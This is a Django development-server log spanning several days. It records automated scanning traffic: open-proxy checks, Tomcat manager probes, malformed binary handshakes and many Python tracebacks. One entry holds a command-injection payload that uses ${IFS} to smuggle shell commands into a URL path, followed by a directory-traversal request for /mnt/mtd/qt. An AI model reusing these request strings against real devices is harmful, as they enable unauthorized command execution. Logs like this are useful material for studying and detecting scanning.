  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[18/Jan/2017 08:13:11] "GET / HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[18/Jan/2017 08:33:12] code 400, message Bad request syntax ('\xa7\x02\x00\x00')
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 117, in handle
    if not self.parse_request(): # An error code has been sent, just exit
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 286, in parse_request
    self.send_error(400, "Bad request syntax (%r)" % requestline)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 368, in send_error
    self.send_response(code, message)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 385, in send_response
    self.log_request(code)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 422, in log_request
    self.requestline, str(code), str(size))
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 138, in log_message
    msg = "[%s] %s\n" % (self.log_date_time_string(), format % args)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xa7 in position 1: ordinal not in range(128)
[18/Jan/2017 09:57:09] "GET http://www.baidu.com/?rands=_553065088030720361227600 HTTP/1.0" 404 1684
[18/Jan/2017 09:57:09] "GET http://23.251.55.38/index.html?rands=_1547533804026467142084136 HTTP/1.0" 404 1711
[18/Jan/2017 10:27:28] "GET http://testp1.piwo.pila.pl/testproxy.php HTTP/1.1" 404 1715
[18/Jan/2017 10:31:21] "CONNECT www.google.com HTTP/1.1" 404 1636
[18/Jan/2017 10:31:21] "CONNECT www.baidu.com HTTP/1.1" 404 1632
[18/Jan/2017 10:31:21] "GET http://www.123cha.com HTTP/1.1" 404 1653
[18/Jan/2017 10:31:22] "GET http://www.boxun.com HTTP/1.1" 404 1649
[18/Jan/2017 11:05:13] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[18/Jan/2017 11:33:04] "GET / HTTP/1.1" 404 2005
[18/Jan/2017 11:54:57] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[18/Jan/2017 12:01:11] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[18/Jan/2017 13:57:18] "CONNECT search.yahoo.com:443 HTTP/1.1" 404 1656
[18/Jan/2017 16:43:54] "CONNECT search.yahoo.com:443 HTTP/1.1" 404 1656
[18/Jan/2017 16:58:45] "GET /cgi/common.cgi HTTP/1.0" 404 2042
[18/Jan/2017 16:58:46] "GET /stssys.htm HTTP/1.0" 404 2030
[18/Jan/2017 16:58:47] "GET / HTTP/1.0" 404 2000
[18/Jan/2017 16:58:48] "POST /command.php HTTP/1.0" 404 2034
[18/Jan/2017 16:58:49] "GET /language/Swedish${IFS}&&echo${IFS}610cker>qt&&tar${IFS}/string.js HTTP/1.0" 404 2263
[18/Jan/2017 16:58:50] "GET /../../../../../../../mnt/mtd/qt HTTP/1.0" 404 2093
[18/Jan/2017 17:29:10] "HEAD http://180.163.113.82/check_proxy HTTP/1.1" 404 0
[18/Jan/2017 18:58:57] "GET http://www.baidu.com/?rands=_391298634045941463646408 HTTP/1.0" 404 1684
[18/Jan/2017 18:59:01] "GET http://23.251.55.38/index.html?rands=_99848850864652014308696 HTTP/1.0" 404 1709
[18/Jan/2017 21:11:40] "GET /manager/html HTTP/1.1" 404 2041
[18/Jan/2017 21:26:25] "GET http://www.qq.com/404/search_children.js HTTP/1.1" 404 1706
[18/Jan/2017 21:26:29] code 400, message Bad request syntax ('\x04\x01\x00PpTi4\x00')
[18/Jan/2017 21:26:29] " PpTi4 " 400 -
[18/Jan/2017 21:26:29] code 400, message Bad request syntax ('\x05\x01\x00')
[18/Jan/2017 21:26:29] " " 400 -
[18/Jan/2017 21:33:22] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1712
[18/Jan/2017 22:49:06] "GET / HTTP/1.1" 404 2000
[18/Jan/2017 23:22:44] "GET http://www.ip.cn/?rands=_22328887688603774600848 HTTP/1.0" 404 1667
[18/Jan/2017 23:22:44] "GET http://m.sogou.com/?rands=_188825307521472253705480 HTTP/1.0" 404 1676
[18/Jan/2017 23:22:44] "GET http://www.baidu.com/?rands=_144667536011028002534656 HTTP/1.0" 404 1684
[19/Jan/2017 00:13:38] "GET /manager/html HTTP/1.1" 404 2041
[19/Jan/2017 00:33:57] "CONNECT search.yahoo.com:443 HTTP/1.1" 404 1656
[19/Jan/2017 01:04:31] code 400, message Bad request syntax ('\x04\x01\x00P\xb4\xa3qR\x00')
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 117, in handle
    if not self.parse_request(): # An error code has been sent, just exit
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 286, in parse_request
    self.send_error(400, "Bad request syntax (%r)" % requestline)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 368, in send_error
    self.send_response(code, message)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 385, in send_response
    self.log_request(code)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 422, in log_request
    self.requestline, str(code), str(size))
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 138, in log_message
    msg = "[%s] %s\n" % (self.log_date_time_string(), format % args)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xb4 in position 5: ordinal not in range(128)
[19/Jan/2017 01:11:06] "GET http://www.baidu.com/ HTTP/1.1" 404 1652
[19/Jan/2017 01:34:58] code 400, message Bad request syntax ('\x05\x02\x00\x02')
[19/Jan/2017 01:34:58] " " 400 -
[19/Jan/2017 01:35:06] "GET /manager/html HTTP/1.1" 404 2041
[19/Jan/2017 04:03:06] "GET http://www.baidu.com/?rands=_41943772162899802052684 HTTP/1.0" 404 1683
[19/Jan/2017 04:03:07] "GET http://23.251.55.38/index.html?rands=_101463324001389444024992200 HTTP/1.0" 404 1713
[19/Jan/2017 06:41:14] "GET /manager/html HTTP/1.1" 404 2041
[19/Jan/2017 06:48:29] "GET http://www.google.com/ HTTP/1.1" 404 1656
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[19/Jan/2017 06:48:29] "GET http://www.google.com/ HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[19/Jan/2017 06:48:29] "GET http://www.123cha.com HTTP/1.1" 404 1653
[19/Jan/2017 06:48:29] "CONNECT www.baidu.com HTTP/1.1" 404 1632
[19/Jan/2017 08:43:23] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[19/Jan/2017 10:52:08] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[19/Jan/2017 11:34:47] "GET http://testp3.pospr.waw.pl/testproxy.php HTTP/1.1" 404 1715
[19/Jan/2017 11:51:53] "GET /manager/html HTTP/1.1" 404 2041
[19/Jan/2017 12:50:49] "GET http://www.baidu.com/?rands=_334095995834059605168128 HTTP/1.0" 404 1684
[19/Jan/2017 12:50:52] "GET http://23.251.55.38/index.html?rands=_40636034238853513589860 HTTP/1.0" 404 1709
[19/Jan/2017 12:53:57] "GET /manager/html HTTP/1.1" 404 2041
[19/Jan/2017 15:12:56] code 400, message Bad request syntax ('\xa7\x02\x00\x00')
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 117, in handle
    if not self.parse_request(): # An error code has been sent, just exit
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 286, in parse_request
    self.send_error(400, "Bad request syntax (%r)" % requestline)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 368, in send_error
    self.send_response(code, message)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 385, in send_response
    self.log_request(code)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 422, in log_request
    self.requestline, str(code), str(size))
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 138, in log_message
    msg = "[%s] %s\n" % (self.log_date_time_string(), format % args)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xa7 in position 1: ordinal not in range(128)
[19/Jan/2017 16:29:10] "CONNECT search.yahoo.com:443 HTTP/1.1" 404 1656
[19/Jan/2017 17:24:13] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1712
[19/Jan/2017 20:46:11] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[19/Jan/2017 22:19:37] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[19/Jan/2017 22:22:15] "GET http://www.baidu.com/?rands=_24208823548254712689544 HTTP/1.0" 404 1683
[19/Jan/2017 22:22:16] "GET http://23.251.55.38/index.html?rands=_5598168452837421619724 HTTP/1.0" 404 1708
[20/Jan/2017 00:01:24] "GET /manager/html HTTP/1.1" 404 2041
[20/Jan/2017 00:02:01] "GET /manager/html HTTP/1.1" 404 2041
[20/Jan/2017 00:25:40] "GET / HTTP/1.1" 404 2000
[20/Jan/2017 00:52:06] "GET / HTTP/1.1" 404 2001
[20/Jan/2017 03:05:28] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[20/Jan/2017 05:56:13] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[20/Jan/2017 05:56:15] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[20/Jan/2017 07:18:19] "GET http://www.baidu.com/?rands=_61655306567465505779280 HTTP/1.0" 404 1683
[20/Jan/2017 07:18:19] "GET http://23.251.55.38/index.html?rands=_2212257984028037461784160 HTTP/1.0" 404 1711
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 116, in handle
    self.raw_requestline = self.rfile.readline()
  File "/usr/lib/python2.7/socket.py", line 447, in readline
    data = self._sock.recv(self._rbufsize)
error: [Errno 104] Connection reset by peer
[20/Jan/2017 11:31:38] "GET / HTTP/1.0" 404 2001
[20/Jan/2017 11:36:49] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[20/Jan/2017 13:04:48] "GET /manager/html HTTP/1.1" 404 2041
[20/Jan/2017 13:07:29] "GET / HTTP/1.1" 404 2005
[20/Jan/2017 14:13:15] "GET http://www.izhongsai.com/show.html?t=1484921595391 HTTP/1.1" 404 1711
[20/Jan/2017 15:00:51] code 400, message Bad request syntax ('\x03\x00\x00\x13\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x03\x00\x00\x00')
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 117, in handle
    if not self.parse_request(): # An error code has been sent, just exit
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 286, in parse_request
    self.send_error(400, "Bad request syntax (%r)" % requestline)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 368, in send_error
    self.send_response(code, message)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 385, in send_response
    self.log_request(code)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 422, in log_request
    self.requestline, str(code), str(size))
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 138, in log_message
    msg = "[%s] %s\n" % (self.log_date_time_string(), format % args)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe0 in position 6: ordinal not in range(128)
[20/Jan/2017 15:02:48] "GET /manager/html HTTP/1.1" 404 2041
[20/Jan/2017 15:14:00] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[20/Jan/2017 16:22:33] "GET http://www.baidu.com/?rands=_1299920392910103718345026000 HTTP/1.0" 404 1688
[20/Jan/2017 16:22:34] "GET http://23.251.55.38/index.html?rands=_17880112081226657283908776 HTTP/1.0" 404 1712
[20/Jan/2017 17:17:10] "GET http://testp3.pospr.waw.pl/testproxy.php HTTP/1.1" 404 1715
[20/Jan/2017 18:21:40] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1712
[20/Jan/2017 20:13:05] "GET /manager/html HTTP/1.1" 404 2041
[20/Jan/2017 22:00:36] "GET /manager/html HTTP/1.1" 404 2041
[20/Jan/2017 23:38:47] "GET / HTTP/1.0" 404 2001
[20/Jan/2017 23:49:42] "GET /manager/html HTTP/1.1" 404 2041
[21/Jan/2017 01:26:09] "GET http://www.baidu.com/ HTTP/1.1" 404 1652
[21/Jan/2017 01:29:50] "GET http://www.baidu.com/?rands=_8220949082837164527400 HTTP/1.0" 404 1682
[21/Jan/2017 01:29:50] "GET http://23.251.55.38/index.html?rands=_1399061575610310853322536 HTTP/1.0" 404 1711
[21/Jan/2017 01:38:43] "GET /blog/ HTTP/1.1" 200 5202
[21/Jan/2017 05:13:34] "GET /blog/ HTTP/1.1" 200 5202
[21/Jan/2017 05:20:55] "GET / HTTP/1.0" 404 2005
[21/Jan/2017 06:33:13] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[21/Jan/2017 09:38:18] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1712
[21/Jan/2017 10:40:24] "GET http://www.baidu.com/?rands=_343292965018636932499072 HTTP/1.0" 404 1684
[21/Jan/2017 10:40:25] "GET http://23.251.55.38/index.html?rands=_121903855609949323890880 HTTP/1.0" 404 1710
[21/Jan/2017 11:34:49] "GET /script HTTP/1.1" 404 2023
[21/Jan/2017 12:04:54] "GET / HTTP/1.0" 404 2001
[21/Jan/2017 12:26:34] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[21/Jan/2017 14:51:43] "GET http://testp4.pospr.waw.pl/testproxy.php HTTP/1.1" 404 1715
[21/Jan/2017 17:27:35] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[21/Jan/2017 18:03:30] "HEAD / HTTP/1.1" 404 0
[21/Jan/2017 19:02:22] "GET /manager/html HTTP/1.1" 404 2041
[21/Jan/2017 19:49:18] "GET http://www.baidu.com/?rands=_20184207377630359049383088 HTTP/1.0" 404 1686
[21/Jan/2017 19:49:20] "GET http://23.251.55.38/index.html?rands=_41909033947188965455968 HTTP/1.0" 404 1709
[21/Jan/2017 19:49:44] code 400, message Bad request syntax ('\xa7\x02\x00\x00')
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 117, in handle
    if not self.parse_request(): # An error code has been sent, just exit
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 286, in parse_request
    self.send_error(400, "Bad request syntax (%r)" % requestline)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 368, in send_error
    self.send_response(code, message)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 385, in send_response
    self.log_request(code)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 422, in log_request
    self.requestline, str(code), str(size))
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 138, in log_message
    msg = "[%s] %s\n" % (self.log_date_time_string(), format % args)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xa7 in position 1: ordinal not in range(128)
[21/Jan/2017 20:09:55] "CONNECT search.yahoo.com:443 HTTP/1.1" 404 1656
[21/Jan/2017 22:44:57] "GET /manager/html HTTP/1.1" 404 2041
[22/Jan/2017 02:29:07] "GET / HTTP/1.1" 404 2005
[22/Jan/2017 04:06:44] "GET / HTTP/1.1" 404 2005
[22/Jan/2017 04:39:56] "GET http://www.baidu.com/?rands=_1414071488028987927156512 HTTP/1.0" 404 1685
[22/Jan/2017 04:39:57] "GET http://23.251.55.38/index.html?rands=_17784124381616266152715792 HTTP/1.0" 404 1712
[22/Jan/2017 05:07:22] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[22/Jan/2017 07:53:46] "GET / HTTP/1.1" 404 2000
[22/Jan/2017 09:09:42] "GET /manager/html HTTP/1.1" 404 2041
[22/Jan/2017 09:36:26] "GET /manager/html HTTP/1.1" 404 2041
[22/Jan/2017 10:32:21] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[22/Jan/2017 12:13:38] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[22/Jan/2017 12:27:36] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1712
[22/Jan/2017 13:14:28] "GET / HTTP/1.1" 404 2004
[22/Jan/2017 13:30:22] "GET http://www.baidu.com/?rands=_1049537729826885883079232 HTTP/1.0" 404 1685
[22/Jan/2017 13:30:23] "GET http://23.251.55.38/index.html?rands=_18620103525015300244586384 HTTP/1.0" 404 1712
[22/Jan/2017 13:37:44] "GET /robots.txt HTTP/1.1" 404 2040
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[22/Jan/2017 13:37:44] "GET /robots.txt HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[22/Jan/2017 13:37:46] "GET / HTTP/1.1" 404 2010
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[22/Jan/2017 13:37:46] "GET / HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[22/Jan/2017 15:23:49] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[22/Jan/2017 15:40:29] "GET / HTTP/1.0" 404 2001
[22/Jan/2017 15:47:25] "GET http://testp3.pospr.waw.pl/testproxy.php HTTP/1.1" 404 1715
[22/Jan/2017 17:16:40] "GET /manager/html HTTP/1.1" 404 2041
[22/Jan/2017 19:07:21] "GET http://clientapi.ipip.net/echo.php?info=20170123030721 HTTP/1.1" 404 1716
[22/Jan/2017 19:07:55] code 400, message Bad request syntax ('\x04\x01\x1f\x00\x00\x00\x00\x00\x00')
[22/Jan/2017 19:07:55] "      " 400 -
[22/Jan/2017 21:11:31] "GET / HTTP/1.1" 404 2000
[22/Jan/2017 22:18:50] "GET http://www.baidu.com/?rands=_570555641618430116689520 HTTP/1.0" 404 1684
[22/Jan/2017 22:18:52] "GET http://23.251.55.38/index.html?rands=_27362613241183728347652 HTTP/1.0" 404 1709
[22/Jan/2017 23:18:43] "GET /manager/html HTTP/1.1" 404 2041
[22/Jan/2017 23:31:39] "GET / HTTP/1.1" 404 2005
[23/Jan/2017 02:20:35] "GET http://www.baidu.com/ HTTP/1.1" 404 1652
[23/Jan/2017 06:21:57] code 400, message Bad request syntax ('\xa7\x02\x00\x00')
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 117, in handle
    if not self.parse_request(): # An error code has been sent, just exit
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 286, in parse_request
    self.send_error(400, "Bad request syntax (%r)" % requestline)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 368, in send_error
    self.send_response(code, message)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 385, in send_response
    self.log_request(code)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 422, in log_request
    self.requestline, str(code), str(size))
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 138, in log_message
    msg = "[%s] %s\n" % (self.log_date_time_string(), format % args)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xa7 in position 1: ordinal not in range(128)
[23/Jan/2017 06:39:57] "GET /script HTTP/1.1" 404 2023
[23/Jan/2017 07:03:21] "GET http://www.baidu.com/?rands=_61261649700122981042786840 HTTP/1.0" 404 1686
[23/Jan/2017 07:03:22] "GET http://23.251.55.38/index.html?rands=_510514593502488902662816 HTTP/1.0" 404 1710
[23/Jan/2017 07:28:25] "GET /robots.txt HTTP/1.1" 404 2036
[23/Jan/2017 07:28:26] "GET / HTTP/1.1" 404 2006
[23/Jan/2017 08:38:06] "GET / HTTP/1.1" 404 2000
[23/Jan/2017 10:37:42] "GET / HTTP/1.0" 404 2001
[23/Jan/2017 12:49:09] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[23/Jan/2017 13:18:48] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1712
[23/Jan/2017 15:55:54] "GET http://www.baidu.com/?rands=_11568167949638814725939544 HTTP/1.0" 404 1686
[23/Jan/2017 15:55:54] "GET http://23.251.55.38/index.html?rands=_1335010091502042405936852 HTTP/1.0" 404 1711
[23/Jan/2017 17:13:40] "GET /robots.txt HTTP/1.1" 404 2040
[23/Jan/2017 17:13:44] "GET / HTTP/1.1" 404 2010
[23/Jan/2017 17:57:37] "GET http://testp4.pospr.waw.pl/testproxy.php HTTP/1.1" 404 1715
[23/Jan/2017 17:57:37] "GET http://www.123cha.com HTTP/1.1" 404 1653
[23/Jan/2017 17:57:37] "CONNECT www.baidu.com HTTP/1.1" 404 1632
[23/Jan/2017 20:32:02] "GET / HTTP/1.1" 404 2004
[23/Jan/2017 23:03:30] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[24/Jan/2017 00:44:36] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[24/Jan/2017 00:52:58] "GET http://www.baidu.com/?rands=_579087861619560695147140 HTTP/1.0" 404 1684
[24/Jan/2017 00:52:58] "GET http://23.251.55.38/index.html?rands=_20979102052016556224647120 HTTP/1.0" 404 1712
[24/Jan/2017 01:20:37] "GET / HTTP/1.0" 404 2001
